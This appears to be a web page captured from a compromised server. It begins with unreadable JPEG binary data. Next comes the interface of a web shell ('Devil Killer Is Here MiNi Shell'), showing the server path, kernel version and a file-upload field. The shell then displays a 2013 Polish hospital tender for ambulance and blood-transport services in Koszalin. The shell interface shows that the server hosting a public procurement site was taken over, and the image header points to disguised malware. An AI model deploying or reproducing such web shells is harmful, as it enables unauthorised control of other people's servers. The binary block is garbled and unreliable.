JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/101881-N-2013.html

<p class="kh_header"><b>Koszalin: Świadczenie sanitarnych usług transportowych na rzecz Specjalistycznego Zespołu Gruźlicy i Chorób Płuc w Koszalinie</b><br>
<b>Numer ogłoszenia: 101881 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Zespół Gruźlicy i Chorób Płuc w Koszalinie , ul. Niepodległości 44-48, 75-252 Koszalin, woj. zachodniopomorskie, tel. 094 3423339, faks 094 3423339.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szgichp.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie sanitarnych usług transportowych na rzecz Specjalistycznego Zespołu Gruźlicy i Chorób Płuc w Koszalinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 -  transport specjalistyczny na terenie miasta Koszalina. Udzielenie pomocy medycznej w razie bezpośredniego zagrożenia zdrowia lub życia pacjentów Zamawiającego wraz z transportem sanitarnym pacjentów ambulansem  z zespołem specjalistycznym typu S.
Wymagany jest przewóz chorych w pozycji lezącej samochodem sanitarnym, spełniającym wymogi Sanepid-u.  
W ramach usługi przewozu Wykonawca zobowiązany będzie do odbioru pacjenta wymagającego szczególnej opieki specjalistycznej z oddziału (pomoc  przy przeniesieniu pacjenta z łóżka do karetki) oraz doprowadzenia  (ewentualnego wniesienia) go do miejsca wskazanego przez Zamawiającego. Dotyczy przewozu pacjenta w sytuacji zagrożenia życia na SOR lub OJOM Szpitala Wojewódzkiego w Koszalinie. Są to usługi zmienne , występujące wyjątkowo w zależności od decyzji lekarza ( na przestrzeni ostatniego roku  średnio był to 1 - 2 wyjazdów w miesiącu).
Wykonawca zobowiązany będzie do świadczenia usługi w dni robocze, soboty, niedziele    i święta, przez  całą dobę. Wykonawca winien stawić się w siedzibie  Zamawiającego na każdorazowe telefoniczne wezwanie. Usługa powinna zostać zrealizoweana niezwłocznie od momentu zgłoszenia. Zamawiający wymaga, aby Wykonawca posiadał sprawny  technicznie samochód sanitarny, przeznaczony do przewozu chorych wymagających szczególnej opieki specjalistycznej w pozycji leżącej w standardzie  S posiadający aktualną decyzję MSW  dopuszczająca karetki do użytkowania jako pojazdy uprzywilejowane w danej jednostce.
Skład zespołu musi być zgodny z definicją zawartą w art. 36 ust.1 ustawy z dnia   8 września 2006 r. o Państwowym Ratownictwie Medycznym (Dz. U. z 2006r. Nr 191, poz.1410 z późn. zm.), tj. składający się z co najmniej trzech osób uprawnionych do wykonywania medycznych czynności ratunkowych w tym lekarza systemu, pielęgniarkę systemu i ratownika medycznego lub lekarza systemu i 2 ratowników. 
Wyposażenie karetki
1.	wyposażenie niezbędne  do ratowania życia pacjenta oraz 
2.	zestaw do podawania tlenu z zaworem redukcyjnym
3.	nosze samojezdne + pasy zabezpieczające
4.	krzesełko kardiologiczne
5.	środek łączności (łączność radiowa  lub telefon komórkowy)
6.	sygnalizacja samochodu  uprzywilejowanego ( świetlna i dźwiękowa) 
7.	sprawna klimatyzacja

Zadanie nr 2 -      transport pacjentów na terytorium Polski ( zespół transportowy ) ,transport krwi  i próbek oraz odbiór wyników badań na terenie miasta Koszalina z transportem sanitarnym pacjentów. ambulansem  z zespołem podstawowym  typu  P. 
Wymagany jest przewóz chorych w pozycji lezącej lub siedzącej samochodem sanitarnym spełniającym wymogi Sanepidu. W ramach usługi przewozu Wykonawca zobowiązany będzie do odbioru pacjenta z oddziału ( pomoc przy przeniesieniu pacjenta z łóżka do karetki) oraz doprowadzenia (ewentualnego wniesienia) go do miejsca wskazanego przez Zamawiającego(mieszkanie, poradnia, inny szpital). 
Jest to przewóz chorych  do Szpitala Wojewódzkiego w Koszalinie celu przeprowadzenia diagnostyki, przewóz badań do Laboratorium i odbiór wyników  oraz transport krwi. Czasami występuje usługa przewozu pacjenta, jeżeli zadecyduje lekarz do domu. Średnio w miesiącu występuje 100 - 110 wyjazdów dot. przewozu chorych i materiałów do badań oraz transportu krwi.
 Wykonawca zobowiązany będzie do świadczenia usługi w dni robocze, soboty, niedziele i święta, przez  całą dobę. Zamawiający wymaga, aby Wykonawca posiadał sprawne  technicznie samochody sanitarne, przeznaczony do przewozu chorych  w pozycji leżącej  lub siedzącej w standardzie  P  posiadające aktualną decyzję MSW dopuszczającą karetki do użytkowania jako pojazdy uprzywilejowane w danej  jednostce.

Wykonawca  zapewni  umiejscowienie  krwi i próbek  do badań w przenośnej lodówce i  winien stawić się w siedzibie  Zamawiającego na każdorazowe telefoniczne wezwanie, najpóźniej  w ciągu 30  minut, licząc od chwili wezwania.
Wyposażenie karetki 
1.	wyposażenie niezbędne  do ratowania życia pacjenta oraz 
2.	zestaw do podawania tlenu z zaworem redukcyjnym
3.	nosze samojezdne + pasy zabezpieczające
4.	krzesełko kardiologiczne
5.	środek łączności ( łączność radiowa  lub telefon komórkowy)
6.	sygnalizacja samochodu  uprzywilejowanego ( świetlna i dźwiękowa) 
7.	sprawna klimatyzacja
8.	lodówka transportowa do przewozu krwi zasilana elektrycznie albo kontener z izolacją wypełniony wkładami  chłodzącymi z termometrem.
Skład zespołu musi być zgodny z definicją zawartą w art. 36 ust.1 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (Dz. U. z 2006r. Nr 191, poz.1410 z późn. zm.), tj. składający się z co najmniej dwie osób uprawnionych do wykonywania medycznych czynności ratunkowych w tym pielęgniarka systemu lub ratownik medyczny.
W skład zespołów typu S i typu P  wchodzi kierowca, w przypadku gdy żaden z członków zespołów ratownictwa medycznego nie posiada prawo jazdy kategorii B oraz nie spełnia  warunków, o których mowa w art. 95a ust. 1 ustawy z dnia 20 czerwca 1997r - Prawo o ruchu  drogowym ( Dz. U.z 2005r Nr 108, poz.908, z poźn. zm.
Wymagania dotyczące wyposażenie środka transportu wraz z zespołem specjalistycznym typu S i P określa załącznik nr 3 do Zarządzenia Nr 12-2011-DSM Prezesa Narodowego Funduszu Zdrowia z dnia 14.03.2011 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu określone w art.22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali lub wykonują usługę w zakresie  transportu sanitarnego dla jednostek służby zdrowia o okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  wykonał  a w przypadku świadczeń okresowych lub ciągłych wykonuje co najmniej  2 usługi    transportu sanitarnego  z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dowodów, potwierdzających, że  te usługi zostały wykonane  lub są wykonywane  należycie. Wykonawca musi się wykazać minimum 2 usługami   świadczenia sanitarnych usług  transportowych o wartości minimum
- 5 000,00 zł brutto  rocznie każda wraz z dokumentami potwierdzającymi, że 
   usługi te   zostały  wykonane   należycie - dla zadania 1.
- 50 000,00 zł brutto  rocznie każda wraz z dokumentami potwierdzającymi, że 
   usługi te   zostały  wykonane   należycie - dla zadania 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowaniu minimum  pięcioma pojazdami do świadczenia usług transportu  sanitarnego wraz z  ich  wykazem  i informacją o podstawie dysponowania tymi karetkami, w tym jeden  do przewozu pacjentów  wymagających   szczególnej  opieki w standardzie  S lub    dwóch  tylko do przewozu pacjentów   szczególnej opieki oraz   zapewni samochody zastępcze (na wypadek awarii samochodów wykonujących  zamówienie)  posiadającymi aktualną decyzję MSW   dopuszczającą  karetki do  użytkowania jako  pojazdy uprzywilejowane w danej   jednostce   wyposażone zgodnie   z wymaganiami  obowiązującymi przepisami   prawa w tym zakresie, co do każdej z części przedmiotu   zamówienia, oraz  zapewni samochody zastępcze (na wypadek awarii samochodów wykonujących  zamówienie).
- Dysponowanie minimum  pięcioma pojazdami do świadczenia usług
  transportu   sanitarnego wraz z  ich  wykazem  i informacją o podstawie 
   dysponowania tymi karetkami, w tym dwóch do przewozu pacjentów  w standardzie P posiadającymi aktualną   decyzję MSW dopuszczającą  karetki do użytkowania jako  pojazdy  uprzywilejowane w danej jednostce wyposażone zgodnie   z wymaganiami obowiązującymi przepisami prawa w tym zakresie, co do  
każdej z części  przedmiotu  zamówienia oraz zapewni samochody zastępcze
(na  wypadek  awarii samochodów wykonujących zamówienie)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do realizacji zamówienia, które będą uczestniczyć bezpośrednio   w wykonywaniu zamówienia w zakresie:
Części 1 - co najmniej 3 osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym: lekarz systemu, pielęgniarka systemu lub ratownik medyczny oraz, że osoby te posiadają wymagane uprawnienia;
Części 2 - co najmniej dwie osoby uprawnione do wykonywania medycznych czynności ratunkowych w tym pielęgniarka systemu lub ratownik medyczny, oraz, że osoby te posiadają wymagane uprawnienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej  działalności  gospodarczej. Opłacona polisa lub inny dokument potwierdzający, że Wykonawca jest  ubezpieczony od odpowiedzialności cywilnej(OC) w zakresie prowadzonej  działalności związanej z przedmiotem   niniejszego zamówienia i polis ubezpieczeniowych następstw nieszczęśliwych  wypadków  kierowcy i pasażerów pojazdu (NW). Wykonawca załączy do oferty    kopię polisy ubezpieczeniowej. Dokumenty złożone w formie kserokopii   muszą być  poświadczone za zgodność  z oryginałem i podpisane  przez osobę    uprawnioną do  składania oświadczeń.  Zamawiający wymaga, opłaconej polisy, a w przypadku jej braku innego  dokumentu potwierdzającego, że Wykonawca jest  ubezpieczony   zakresie prowadzonej działalności związanej z przedmiotem zamówienia  na   kwotę nie niższą niż 50 000.00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenie danych wykonawcy 
2. wypełniony i podpisany formularz  ofertowy   
3. zaparafowany  wzór umowy   
4. pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań  w imieniu  firmy  składającej ofertę, o  ile nie   wynikają z przepisów prawa lub innych   dokumentów (jeżeli  dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszcza się możliwość obniżenia wielkości ceny, w przypadku gdy Wykonawca 
  w okresie    realizacji umowy zaproponuje ten sam produkt w niższej cenie.
2.Zaistnienia okoliczności  leżących po stronie Zamawiającego, w szczególności     spowodowanych  sytuacja finansową, zdolnościami płatniczymi lub warunkami 
organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia  w      chwili  zawarcia umowy - zmianie może ulec termin realizacji umowy.
      albo*
gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy 
okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie  ponosi  odpowiedzialności, skutkująca brakiem możliwości należytego wykonania 
umowy, zgodnie ze siwz  - zamawiający dopuszcza możliwość zmiany umowy, w  szczególności terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szgichp.med.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPECJALISTYCZNY ZESPÓŁ GRUŹLICY I CHORÓB PŁUC, 75-252 KOSZALIN, UL.NIEPODLEGŁOŚCI 44-48, STANOWISKO DS. ZAMÓWIEŃ PUBLICZNYCH..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2013 godzina 10:00, miejsce: SEKRETARIAT SPECJALISTYCZNEGO ZESPOŁU GRUŹLICY I CHORÓB PŁUC, 75-352 KOSZALIN, UL. NIEPODLEGŁOŚCI 44-48.OTWARCIE 17.06.2013r o godzinie 10.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1
Transport specjalistyczny na terenie miasta Koszalina. Udzielenie pomocy medycznej przez Zespół ratunkowy typu S w razie bezpośredniego zagrożenia zdrowia lub życia pacjentów Zamawiającego wraz z transportem sanitarnym pacjentów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Udzielenie pomocy medycznej w razie bezpośredniego zagrożenia zdrowia lub życia pacjentów Zamawiającego wraz z transportem sanitarnym pacjentów ambulansem  z zespołem specjalistycznym typu S. 
Wymagany jest przewóz chorych w pozycji lezącej samochodem sanitarnym, spełniającym wymogi Sanepid-u.  
W ramach usługi przewozu Wykonawca zobowiązany będzie do odbioru pacjenta wymagającego szczególnej opieki specjalistycznej z oddziału (pomoc  przy przeniesieniu pacjenta z łóżka do karetki) oraz doprowadzenia  (ewentualnego wniesienia) go do miejsca wskazanego przez Zamawiającego. Dotyczy przewozu pacjenta w sytuacji zagrożenia życia na SOR lub OJOM Szpitala Wojewódzkiego w Koszalinie. Są to usługi zmienne , występujące wyjątkowo w zależności od decyzji lekarza ( na przestrzeni ostatniego roku  średnio był to 1 - 2 wyjazdów w miesiącu).
Wykonawca zobowiązany będzie do świadczenia usługi w dni robocze, soboty, niedziele  i święta, przez  całą dobę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2
Transport pacjentów na terytorium Polski (zespół transportowy typu P) transport krwi i próbek oraz odbiór wyników badań na terenie miasta Koszalina..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - transport pacjentów na terytorium Polski ( zespół transportowy) ,transport krwi  i próbek oraz odbiór wyników badań na terenie miasta Koszalina z transportem sanitarnym pacjentów ambulansem  z zespołem podstawowym  typu  P.
Wymagany jest przewóz chorych w pozycji lezącej lub siedzącej samochodem sanitarnym spełniającym wymogi Sanepidu. W ramach usługi przewozu Wykonawca zobowiązany będzie do odbioru pacjenta z oddziału ( pomoc przy przeniesieniu pacjenta z łóżka do karetki) oraz doprowadzenia (ewentualnego wniesienia) go do miejsca wskazanego przez Zamawiającego (mieszkanie, poradnia, inny szpital). 
